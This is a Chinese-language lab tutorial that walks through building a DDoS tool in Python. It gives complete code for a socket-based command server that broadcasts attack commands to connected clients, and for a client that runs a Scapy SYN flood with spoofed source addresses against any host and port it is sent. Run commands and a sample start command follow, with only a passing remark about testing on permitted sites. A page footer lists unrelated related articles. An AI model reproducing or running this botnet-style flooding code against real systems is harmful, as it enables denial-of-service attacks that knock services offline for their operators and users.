结合Socket实现DDoS攻击
一、实验说明
1. 实验介绍
通过上一节实验的SYN
泛洪攻击结合Socket
实现DDoS攻击。
2. 开发环境
- Ubuntu Linux
- Python 3.x版本
3. 知识点
本次实验将涉及以下知识点:
- argparse 命令解析
- socket的基本用法
4. 效果图
二、理论知识
1. 实现思路
由于上节实验我们已经实现了SYN泛洪攻击
,而DDoS则是多台主机一起发起攻击,我们只需要能发送命令,让连接到服务器的客户端一起向同一目标发起攻击就可以了。
对安全领域比较关注的朋友可能都知道世界最大的黑客组织Anonymous
经常使用LOIC(Low Orbit Ion Cannon,低轨道离子炮)
进行大规模的DDoS。LOIC
有个HIVEMIND
模式,用户可以通过连接到一台IRC服务器,当有用户发送命令,任何以HIVEMIND
模式连接到IRC服务器的成员都会立即攻击该目标!
这种方式的优点是不需要傀儡机,可以有很多“志同道合”
的人一起帮助你实现DDoS,不过不太适合在傀儡机中使用。当然实现思路有很多,根据不同情况的选择也会不同。而这里我们将采用客户端、服务器的方式来实现DDoS,这种方式非常简单,可扩展性也比较强。
2. argparse模块
由于Server端需要发送命令去控制Client端发起攻击,所以这里我们先规定好命令格式:
'#-H xxx.xxx.xxx.xxx -p xxxx -c <start|stop>'
-H
后面是被攻击主机的IP地址,-p
指定被攻击的端口号,-c
控制攻击的开始与停止。
命令制定好了,现在我们来学习一下命令解析库argparse
的用法。看过我其他实验的同学可能已经了解argparse
的用法了,这里可以跳过或者当做复习重新学习一遍。 先来看一下argparse
的文档:
在文档的描述中,可以看出argparse
是一个命令行解析库,代替了老版本的optparse
。下面我们通过一个例子一起了解一下argparse
的基本用法!
#导入argparse库
import argparse
#创建ArgumentParser对象
parser = argparse.ArgumentParser(description='Process some integers.')
#添加参数
parser.add_argument('-p', dest='port', type=int,
help='An port number!')
#解析命令行参数
args = parser.parse_args()
print('Port:',args.port)
上面的例子中,我们创建了一个ArgumentParser
对象,description
参数是对命令行解析的一个描述信息,通常在我们使用-h
命令的时候显示。add_argument
添加我们要解析的参数,这里我们只添加了一个-p
参数,dest
是通过parse_args()
函数返回的对象中一个属性的名称。type
大家应该很好理解,就是解析参数的类型。help
指定的字符串是为了自动生成帮助信息。argparse
默认就支持-h
参数,只要我们在添加参数的时候指定了help
的值就可以生成帮助信息了。
3. socket模块
Python中的socket
提供了访问BSDsocket
的接口,可以非常方便的实现网络中的信息交换。通常我们使用socket
的时候需要指定ip地址、端口号以及协议类型
。在进行socket
编程之前我们先了解一下客户端(Client)和服务器(Server)
的概念。通俗的讲主动发起连接请求的称为客户端
,监听端口响应连接的我们称为服务器
。 下面我写一个客户端和服务器的例子:
客户端
#导入socket库
import socket
#创建socket:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#建立连接
s.connect(('192.168.0,100', 7786))
在上面的这个例子我们首先导入socket库,然后创建了一个socket对象,socket对象中的参数AF_INET
表示我们使用的是IPV4协议,SOCK_STREAM
则表示我们使用的是基于流的TCP协议。最后我们指定ip地址
和端口号
建立连接。
服务器
#导入socket库
import socket
cliList = []
#创建socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#绑定地址和端口号
s.bind(('0.0.0.0', 7786)):
#开始监听
s.listen(10)
while True:
# 接受一个新的连接:
sock, addr = s.accept()
#将sock添加到列表中
cliList.append(sock)
可以看到服务器的写法稍稍比客户端复杂一些,在创建玩socket之后,要绑定一个地址和端口,这里的0.0.0.0
表示绑定到所有的网络地址,端口号只要不是已经使用的端口号就可以了。之后开始监听端口,并在参数中指定最大连接数为10。最后我们循环等待新的连接,并将已连接的sock对象添加到了一个列表中。注意这里accept()
默认是阻塞的,还可以通过settimeout()
设定等待时间或者setblocking()
设置为非阻塞模式,更多的相关细节可以查看Python官方文档。
三、编码实现
通过前面的学习我们已经了解了本次实验需要的基础知识,现在我们就来分别实现Server端和Client端。
1. Server端
由于Server端能等待Client主动连接,所以我们在Server端发送命令,控制Client端发起SYN泛洪攻击
。
实现主函数的完整逻辑,在主函数中我们创建socket, 绑定所有网络地址
和58868
端口并开始监听,之后我们新开一个线程来等待客户端的连接,以免阻塞我们输入命令。
def main():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('0.0.0.0', 58868))
s.listen(1024)
t = Thread(target=waitConnect,args=(s,))
t.start()
由于我们要给所有客户端发送命令,所以我们在新开的线程中将连接进来的socket添加到一个list中,这个我们稍后介绍,但在主函数中我们第一次输入命令之前需要至少有一个客户端连接到服务器,所以这里我们判断了一下socket
的长度。
print('Wait at least a client connection!')
while not len(socketList):
pass
print('It has been a client connection!')
现在循环等待输入命令,输入之后判断命令是否满足命令格式的基本要求,如果满足了,我们就把命令发送给所有客户端。
while True:
print('=' * 50)
print('The command format:"#-H xxx.xxx.xxx.xxx -p xxxx -c <start>"')
#等待输入命令
cmd_str = input('Please input cmd:')
if len(cmd_str):
if cmd_str[0] == '#':
sendCmd(cmd_str)
现在我们程序的大体框架已经有了,现在我们来编写主函数中没有完成的子功能。 首先我们应该实现等待客户端的函数,方便开启新的线程。
在这个函数中,我们只需要循环等待客户端的连接就可以了,新连接的socket要判断一下是否在socketList中已经存储过了,如果没有的话就添加到socketList中。
#等待连接
def waitConnect(s):
while True:
sock,addr = s.accept()
if sock not in socketList:
socketList.append(sock)
我们再来实现发送命令的函数,这个函数我们遍历socketList这个列表,将每个socket都调用一次send
将命令发送出去。
#发送命令
def sendCmd(cmd):
print('Send command......')
for sock in socketList:
sock.send(cmd.encode('utf-8'))
至此我们的Server端
就完成了,是不是很简单!当然我们只是实现了基本功能,还有很多可以扩展,这个就留给同学们发挥了,举一反三进步才会快!
我们来看一下Server端
的完整代码:
import socket
import argparse
from threading import Thread
socketList = []
#命令格式'#-H xxx.xxx.xxx.xxx -p xxxx -c <start|stop>'
#发送命令
def sendCmd(cmd):
print('Send command......')
for sock in socketList:
sock.send(cmd.encode('utf-8'))
#等待连接
def waitConnect(s):
while True:
sock,addr = s.accept()
if sock not in socketList:
socketList.append(sock)
def main():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('0.0.0.0', 58868))
s.listen(1024)
t = Thread(target=waitConnect,args=(s,))
t.start()
print('Wait at least a client connection!')
while not len(socketList):
pass
print('It has been a client connection!')
while True:
print('=' * 50)
print('The command format:"#-H xxx.xxx.xxx.xxx -p xxxx -c <start>"')
#等待输入命令
cmd_str = input('Please input cmd:')
if len(cmd_str):
if cmd_str[0] == '#':
sendCmd(cmd_str)
if __name__ == '__main__':
main()
2. Client端
我们将在Client端实现对主机的SYN泛洪攻击
,并在脚本启动后主动连接Server端,等待Server端发送命令。
还是先看主函数了解一下整体思路,在主函数中我们先创建ArgumentParser()
对象,并将需要解析的命令参数添加好。
def main():
p = argparse.ArgumentParser()
p.add_argument('-H', dest='host', type=str)
p.add_argument('-p', dest='port', type=int)
p.add_argument('-c', dest='cmd', type=str)
现在可以创建socket,连接服务器了。这里为了测试我们连接到本地地址的58868端口吧!之后我们就可以等待服务器发送命令了。
try:
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('127.0.0.1',58868))
print('To connected server was success!')
print("=" * 40)
cmdHandle(s,p)
except:
print('The network connected failed!')
print('Please restart the script!')
sys.exit(0)
我们将接收命令和处理命令定义在了一个单独的函数中。在这里我们用到了一个全局变量,用于判断是否有进程正在发起SYN泛洪攻击。之后就开始循环接收命令了,接收之后到的数据是byte
型,我们需要对其进行解码,解码之后才是字符串。如果接收到的数据长度为0,就跳过后续的内容,重新接收数据。
#处理命令
def cmdHandle(sock,parser):
global curProcess
while True:
#接收命令
data = sock.recv(1024).decode('utf-8')
if len(data) == 0:
print('The data is empty')
continue
`
如果数据的长度不为0,就判断是否具有命令基本格式的特征(#
),满足基本条件就需要用我们的ArgumentParser
对象来解析命令了。
if data[0] == '#':
try:
#解析命令
options = parser.parse_args(data[1:].split())
m_host = options.host
m_port = options.port
m_cmd = options.cmd
命令参数解析出来后,我么就要判断到底是start
命令还是stop
命令了,如果是start
命令,我们首先判断当前是否有进程在运行,如果有进程判断进程是否存活。如果当前有进程正在发起SYN泛洪攻击
,我们就先结束这个进程,并清空屏幕。然后我们就直接启动一个进程,发起SYN泛洪攻击
。
#DDoS启动命令
if m_cmd.lower() == 'start':
if curProcess != None and curProcess.is_alive():
#结束进程
curProcess.terminate()
curProcess = None
os.system('clear')
print('The synFlood is start')
p = Process(target=synFlood,args=(m_host,m_port))
p.start()
curProcess = p
如果命令是stop
,并且有进程存活,我们就直接结束这个进程,并清空屏幕。否则就什么也不做。
#DDoS停止命令
elif m_cmd.lower() =='stop':
if curProcess.is_alive():
curProcess.terminate()
os.system('clear')
except:
print('Failed to perform the command!')
由于SYN泛洪攻击
我们在上一节实验中已经实现,这里就不多介绍了。现在我们看一下完整的Client端
代码:
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import sys
import socket
import random
import argparse
from multiprocessing import Process
from scapy.all import *
import os
isWorking = False
curProcess = None
#SYN泛洪攻击
def synFlood(tgt,dPort):
print('='*100)
print('The syn flood is running!')
print('='*100)
srcList = ['201.1.1.2','10.1.1.102','69.1.1.2','125.130.5.199']
for sPort in range(1024,65535):
index = random.randrange(4)
ipLayer = IP(src=srcList[index], dst=tgt)
tcpLayer = TCP(sport=sPort, dport=dPort,flags="S")
packet = ipLayer / tcpLayer
send(packet)
#命令格式'#-H xxx.xxx.xxx.xxx -p xxxx -c <start>'
#处理命令
def cmdHandle(sock,parser):
global curProcess
while True:
#接收命令
data = sock.recv(1024).decode('utf-8')
if len(data) == 0:
print('The data is empty')
return
if data[0] == '#':
try:
#解析命令
options = parser.parse_args(data[1:].split())
m_host = options.host
m_port = options.port
m_cmd = options.cmd
#DDoS启动命令
if m_cmd.lower() == 'start':
if curProcess != None and curProcess.is_alive():
curProcess.terminate()
curProcess = None
os.system('clear')
print('The synFlood is start')
p = Process(target=synFlood,args=(m_host,m_port))
p.start()
curProcess = p
#DDoS停止命令
elif m_cmd.lower() =='stop':
if curProcess.is_alive():
curProcess.terminate()
os.system('clear')
except:
print('Failed to perform the command!')
def main():
#添加需要解析的命令
p = argparse.ArgumentParser()
p.add_argument('-H', dest='host', type=str)
p.add_argument('-p', dest='port', type=int)
p.add_argument('-c', dest='cmd', type=str)
print("*" * 40)
try:
#创建socket对象
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#连接到服务器端
s.connect(('127.0.0.1',58868))
print('To connected server was success!')
print("=" * 40)
#处理命令
cmdHandle(s,p)
except:
print('The network connected failed!')
print('Please restart the script!')
sys.exit(0)
if __name__ == '__main__':
main()
四、程序测试
准备工作都做好了,现在我们来测试一下我们的脚本是否能完成我们的任务。
首先我们运行Server端
脚本:
sudo python3 ddosSrv.py
然后运行Client端
脚本,记住这里一定要用root
权限来运行:
sudo python3 ddosCli.py
可以看到Client端
已经提示连接成功了
Server端
也提示有一个客户端连接了,而且可以输入命令了。
我们输入一个命令测试一下,为了维护绿色的网络环境,最好找个允许测试的站点:
#-H x.x.x.x -p 80 -c start
看看Client端
是否已经开始SYN泛洪攻击了
:
Client端
已经开始发送数据包了,说明已经发起了SYN泛洪攻击
。至此我们的实验就全部完成了。
五、总结
通过这两节的实验我们应该已经掌握了基于Scapy DDoS攻击的实现方法,其实方法还有很多,同学们可以根据本次实验扩展一下,使本次实验的脚本更加完善或者采用新的方式实现DDoS。 下面总结一下这两次实验所涉及到的知识点:
- 使用
Scapy
实现SYN数据包 - Python中
argparse
的用法 - Python中
socket
的用法 - 使用socket实现
客户端
与服务器
结合Socket实现DDoS攻击的更多相关文章
- 配置 Haproxy 防范 DDOS 攻击
作为 load balancer, Happroxy 常常作为服务器的前端,向外界用户提供服务的入口,如果能在入口处处理安全相关问题,将极大简化后端的设计.事实上,Haproxy 不仅仅是一款开源出色 ...
- 阿里云容器服务--配置自定义路由服务应对DDOS攻击
阿里云容器服务--配置自定义路由服务应对DDOS攻击 摘要: 容器服务中,除了slb之外,自定义路由服务(基于HAProxy)也可以作为DDOS攻击的一道防线,本文阐述了几种方法来应对普通规模的DDO ...
- 浅谈拒绝服务攻击的原理与防御(4):新型DDOS攻击 – Websocket和临时透镜
0×01 前言 前几天我已经分别发了三篇关于DDOS攻击相关的文章,我也是第一次在freebuf上发表这种文章,没想到有那么多人点击我真的很开心,前几天我为大家介绍的DDOS攻击的方法和原理都是已经出 ...
- 破坏之王DDoS攻击与防范深度剖析【学习笔记】
一.DDoS初步印象 1.什么是分布式拒绝服务攻击? 1)首先它是一种拒绝服务攻击 我们可以这么认为,凡是导致合法用户不能访问服务的行为,就是拒绝服务攻击. 注:早期的拒绝服务主要基于系统和应用程序的 ...
- python编写DDoS攻击脚本
python编写DDoS攻击脚本 一.什么是DDoS攻击 DDoS攻击就是分布式的拒绝服务攻击,DDoS攻击手段是在传统的DoS攻击基础之上产生的一类攻击方式.单一的DoS攻击一般是采用一对一方式的, ...
- 【转】《从入门到精通云服务器》第四讲—DDOS攻击
上周咱们深入分析了云服务器的配置问题,好了,现在手上有了云服务器之后,我们又不得不提它:DDOS攻击.这是所有运维者的心头痛,也是任何公司听闻后都将心惊胆战的强大对手.下面我们将用浅显易懂的方式讲述什 ...
- 防DDOS攻击SHELL脚本
最近一段时间服务器频繁遭到DDOS攻击,目前只能通过封IP来源来暂时解决.IP不源变化多端,光靠手工来添加简直是恶梦,想了个方法,用SHELL来做. 比较简单,但很实用:) 以下内容根据作者原文进行适 ...
- 漫画告诉你什么是DDoS攻击?
本文作者:魏杰 文章转载自:绿盟科技博客,原文标题:看ADS如何治愈DDoS伤痛 根据<2015 H1绿盟科技DDoS威胁报告>指出,如今大流量网络攻击正逐渐呈现增长趋势,前不久锤子科技的 ...
- linux笔记_防止ddos攻击
一.什么是DoS攻击 DoS是Denial of Service的简称,即拒绝服务,造成DoS的攻击行为被称为DoS攻击,其目的是使计算机或网络无法提供正常的服务.最常见的DoS攻击有计算机网络带宽攻 ...
随机推荐
- C# SerialPort自定义串口DCB
C# SerialPort自定义串口DCBChange DCB fields from SerialPort instance CPS:中文DCB结构详解表 译自Change DCB fields f ...
- Linux命令top 详解
top命令是Linux下常用的性能分析工具,能够实时显示系统中各个进程的资源占用状况,类似于Windows的任务管理器.下面详细介绍它的使用方法. top - 01:06:48 up 1:22, 1 ...
- POJO
简单的Java对象(Plain Ordinary Java Objects)实际就是普通JavaBeans,使用POJO名称是为了避免和EJB混淆起来, 而且简称比较直接. 其中有一些属性及其gett ...
- (luogu1704)寻找最优美做题曲线 [TPLY]
寻找最优美做题曲线 题目链接:https://www.luogu.org/problemnew/show/P1704 题目大意: 求包含指定点的最长不降子序列(严格递增) 题解 首先我们发现 一个序列 ...
- 【BZOJ1207】【HNOI2004】打鼹鼠(动态规划)
[BZOJ1207][HNOI2004]打鼹鼠 题面 BZOJ题面 题解 考虑到m的范围只有10000 O(m^2)的复杂度是可以接受的 所以直接暴力DP 每次枚举前面出现的鼹鼠 检查是否能够转移过来 ...
- mysql mariadb 删除表中的数据时数据库变大
删除表中数据以前 [root@RM uar3]# du -sh * 3.3G apache-tomcat-7.0.54 150M instalRM4UAR 0 mariadb 903M mariadb ...
- Android 音视频编解码——YUV视频格式详解
一.YUV 介绍 YUV是一种颜色编码方方式,通常由彩色摄像机进行取像,然后把取得的彩色图像信号经过分色.分别放大校正后得到RGB,再经过矩阵变换得到亮度信号Y和两个色差信号B-Y(即U).R-Y(即 ...
- setup命令的安装
2018-03-01 10:25:18 最小化安装的Linux系统,setup命令使用不了 安装方法:yum install setuptool #安装完以后,只要直接输入 setup,就会出 ...
- route路由的顺序问题了数据包的转发流程
2018-02-28 15:29:26 [root@linux ~]# routeKernel IP routing tableDestination Gateway ...
- Python进程-实现
multiprocessing模块介绍 python中的多线程无法利用CPU资源,在python中大部分计算密集型任务使用多进程.如果想要充分地使用多核CPU的资源(os.cpu_count()查看) ...